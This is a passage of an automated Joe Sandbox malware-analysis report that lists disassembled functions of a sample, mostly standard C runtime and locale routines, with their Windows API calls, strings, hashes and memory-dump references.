                                                                                                                                                                                            • Instruction ID: 3d34e756b2dd9079a0ed920974f7f921588ce16fc5eea71460e4fb2b0844a2d1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B115171640B06BBD521B7B0CC1BFCB7FACBFC0B40F400C29BA9967252DA75B5058650
                                                                                                                                                                                            Function 00556642 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00556637,?,?,005565FF,00000001,00000000,?), ref: 00556657
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0055666A
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00556637,?,?,005565FF,00000001,00000000,?), ref: 0055668D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: @0S$CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-38058037
                                                                                                                                                                                            • Opcode ID: 0d8e23fc375b6c218af9c9ce41496cd0948e89b62390e570b8de36b63ad21486
                                                                                                                                                                                            • Instruction ID: 324df62bc6505420b71ec093a6a80c2fb6f84f28f96234cc0a223e1b004d5261
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d8e23fc375b6c218af9c9ce41496cd0948e89b62390e570b8de36b63ad21486
                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F08234501218FBDB119B64EC1AB9D7EA8FB01756F000160E905B31A0CBB09E05FA94
                                                                                                                                                                                            Function 0055DE56 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 0055DE9E
                                                                                                                                                                                            • __fassign.LIBCMT ref: 0055E083
                                                                                                                                                                                            • __fassign.LIBCMT ref: 0055E0A0
                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0055E0E8
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0055E128
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0055E1D0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1735259414-0
                                                                                                                                                                                            • Opcode ID: f190ce61500fdf60f4be70a3cf2b69993072ad27871bf577e1b570d0c21e688a
                                                                                                                                                                                            • Instruction ID: c55d9a90a390d14cbe127cb0a043ff432fb12c4c621ff34d334d18f012fd218b
                                                                                                                                                                                            • Opcode Fuzzy Hash: f190ce61500fdf60f4be70a3cf2b69993072ad27871bf577e1b570d0c21e688a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C1BE75D002599FCB18CFA8C8959EDBFB5BF48304F28416AE816F7241D6319E4ACF60
                                                                                                                                                                                            Function 0055051C Relevance: 9.2, APIs: 6, Instructions: 224COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 005505A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00550635
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005506A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005506C1
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00550724
                                                                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00550741
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2984826149-0
                                                                                                                                                                                            • Opcode ID: 6dd46b3c1b2f43bbcd30eb3a1806befef67ab45a6a72bf7017390ec6b2e91a27
                                                                                                                                                                                            • Instruction ID: bd9a13449d6dd11f83e43dd4eb1cd154fe753630c7f03ab479b9c0066dd6f900
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd46b3c1b2f43bbcd30eb3a1806befef67ab45a6a72bf7017390ec6b2e91a27
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A71707591020AABDF218FA4CC65AEE7FB6FF89352F141057EC05A61D1EA31D848DFA0
                                                                                                                                                                                            Function 005502E2 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0055032B
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00550396
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005503B3
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005503F2
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00550451
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00550474
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                                                                            • Opcode ID: 3f4a1b0f06926a7a099c06f54ee0c0cc3d65131072c804d3a294e3fb654d30ab
                                                                                                                                                                                            • Instruction ID: 4a99de5f8d0ccea0a051e344b6a9e201ee5f6cda39c4d313f6034faa55570b24
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f4a1b0f06926a7a099c06f54ee0c0cc3d65131072c804d3a294e3fb654d30ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7651AE7250020AEBEF208FA4CC59FAA7FA9FF50752F154926FE05A6190D7748C58DBA0
                                                                                                                                                                                            Function 00560E0B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID: $iU
                                                                                                                                                                                            • API String ID: 3213747228-1866154683
                                                                                                                                                                                            • Opcode ID: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
                                                                                                                                                                                            • Instruction ID: 68f28d9af5df43618dbe5b4d7d74ef551979f3f1d79cd921d66d1f96d8d62f9b
                                                                                                                                                                                            • Opcode Fuzzy Hash: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49B146329006869FDF21CF28C8557BEBFF5FF55310F18446AE844AB282D6359D41CB64
                                                                                                                                                                                            Function 0055395A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00553951,005527FB,005515E7), ref: 00553968
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00553976
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0055398F
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00553951,005527FB,005515E7), ref: 005539E1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: 8f93668169d5f6ce9dee24cd37293220d0a3f4fc45a4887dfaf255545df91966
                                                                                                                                                                                            • Instruction ID: 21a25a79b4dcae4a5d71d69b6d353842298ce5afe40ebb36488bbba5937edb7d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f93668169d5f6ce9dee24cd37293220d0a3f4fc45a4887dfaf255545df91966
                                                                                                                                                                                            • Instruction Fuzzy Hash: E501F97220E2125FAB205A747CAE6262E64FB513B7320033BF81C422E1FF914D4C7640
                                                                                                                                                                                            Function 00553A71 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID: @0S
                                                                                                                                                                                            • API String ID: 1740715915-2734645871
                                                                                                                                                                                            • Opcode ID: a1faf618768a59923df29421c6b99ebdad25d5e8bc96b92984b0a85c4d0d6962
                                                                                                                                                                                            • Instruction ID: 052d58860132e7b9c633ed816081a7474343ccd288a259cdbef0a02766f80efe
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1faf618768a59923df29421c6b99ebdad25d5e8bc96b92984b0a85c4d0d6962
                                                                                                                                                                                            • Instruction Fuzzy Hash: 285135726006069FDB258F40C865B7ABFA4FF447A2F24452FEC0A87691E731EE48D790
                                                                                                                                                                                            Function 005549F2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00554AB3,?,?,00580B4C,00000000,?,00554BDE,00000004,InitializeCriticalSectionEx,00571958,mscoree.dll,00000000), ref: 00554A82
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                                                                            • Opcode ID: 7308eed89543c7a78658c702f66a5a05332fc5be1f9fd266ad60e94bcf1c6357
                                                                                                                                                                                            • Instruction ID: 3a9ec24123554feefa001d2a180f8a52c7f3c0d8b3cb553246e558d9c53ca142
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7308eed89543c7a78658c702f66a5a05332fc5be1f9fd266ad60e94bcf1c6357
                                                                                                                                                                                            • Instruction Fuzzy Hash: A511E732A81220ABDF628B6CDC1575A3B99BF12776F150112ED01E7280D770ED889AD9
                                                                                                                                                                                            Function 00566188 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 005661A0
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 005661B2
                                                                                                                                                                                            • _free.LIBCMT ref: 005661C4
                                                                                                                                                                                            • _free.LIBCMT ref: 005661D6
                                                                                                                                                                                            • _free.LIBCMT ref: 005661E8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 3929782ac02f31ff52d32ce2b1f76f1ec31ad196b5a36485f02c832c345ba167
                                                                                                                                                                                            • Instruction ID: 10a0ec00c3a58abb1235b39c84cc1c0b134e037a0f553aaf835d896593e255d7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3929782ac02f31ff52d32ce2b1f76f1ec31ad196b5a36485f02c832c345ba167
                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF0F932504345AF8621EB68FA8AC1B7FEDBA51B21BA40816F81CD7502CB30FC84DB60
                                                                                                                                                                                            Function 00531CC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 00531D46
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 46a0964bc5ff0cfb18438dafd1a22b864d7872b894612f5b23040e3e8439674d
                                                                                                                                                                                            • Instruction ID: 0add2ee2da8f0737db10abce4187e0fe7011787ecdf2ca7613f3790e576fbd5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a0964bc5ff0cfb18438dafd1a22b864d7872b894612f5b23040e3e8439674d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 386157B5A006059FDB10CF64C895B9ABBF8FF48304F1484A9ED099F346D776E905CBA1
                                                                                                                                                                                            Function 005323F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 0053254F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-1866435925
                                                                                                                                                                                            • Opcode ID: c68d7e1883d620cb61473224c63922ac806844f3a7a5fe96857980545e8fbe2e
                                                                                                                                                                                            • Instruction ID: 34f5094f1ddde80f96cee9eb8260604cfc170964c4c793469d0a6ebdebfed87c
                                                                                                                                                                                            • Opcode Fuzzy Hash: c68d7e1883d620cb61473224c63922ac806844f3a7a5fe96857980545e8fbe2e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0251BF76601A159FCB20CF59D484E99FBF4FF58314F1481AAE9099B712D731ED05CBA0
                                                                                                                                                                                            Function 00531ED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 00531F88
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 8286a9126da931dc70d12c8388d47c684608ce898b0e44fe955f1322401a92e1
                                                                                                                                                                                            • Instruction ID: 576287548d1addac700ea4b06dc85bd66c56fb02710225c49fe361059fb9f069
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8286a9126da931dc70d12c8388d47c684608ce898b0e44fe955f1322401a92e1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 594190B0600B059FEB20DF65C499B5ABFF4BF04304F44852DE94A8B782E7B5E918CB91
                                                                                                                                                                                            Function 00544D30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 00544D99
                                                                                                                                                                                              • Part of subcall function 0054F760: std::_Lockit::_Lockit.LIBCPMT ref: 0054F772
                                                                                                                                                                                              • Part of subcall function 0054F760: std::locale::_Setgloballocale.LIBCPMT ref: 0054F78D
                                                                                                                                                                                              • Part of subcall function 0054F760: _Yarn.LIBCPMT ref: 0054F7A3
                                                                                                                                                                                              • Part of subcall function 0054F760: std::_Lockit::~_Lockit.LIBCPMT ref: 0054F7E3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 238635018-1866435925
                                                                                                                                                                                            • Opcode ID: 7a4d42e0865365c8b0c8d60e3eb84ce54699b47aab27697d270bc64f63e6f70c
                                                                                                                                                                                            • Instruction ID: d74f348c0d9cfd1594bed096bc429199fd0f464398da140230007020ac56fea0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a4d42e0865365c8b0c8d60e3eb84ce54699b47aab27697d270bc64f63e6f70c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 083190B19007059FE720DF65C459B97BFE4BF84308F048929D9468B682EBB9E909CF91
                                                                                                                                                                                            Function 0053F3A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92processCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 0053F447
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0053F45A
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0053F45F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                            • API String ID: 2922976086-2746444292
